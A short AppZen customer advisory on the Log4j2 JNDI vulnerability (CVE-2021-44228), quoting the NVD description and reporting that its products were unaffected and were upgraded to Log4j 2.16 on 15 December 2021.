On 9 December 2021, a Critical Zero-Day vulnerability was disclosed by Apache that affects Apache Log4j2 (CVE-2021-44228). We are sharing information about the vulnerability, what AppZen is doing to provide you with appropriate coverage.
What is the Apache Log4j2 JNDI Vulnerability?
From the NIST National Vulnerability Database (CVE-2021-44228):
“Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default.”
What AppZen products are impacted by the vulnerability?
Expense Audit: This vulnerability did not impact AppZen Expense Audit. As a precaution, AppZen will update the vulnerable libraries in the upcoming release.
Autonomous AP: This vulnerability did not impact Autonomous AP application.
AppZen AppStore: This vulnerability did not impact Mastermind Analytics application.
Mitigation Applied: Even though the vulnerability did not impact AppZen, Applications will be upgraded to the Log4j version to 2.16. The Update was deployed on 15-Dec-2021.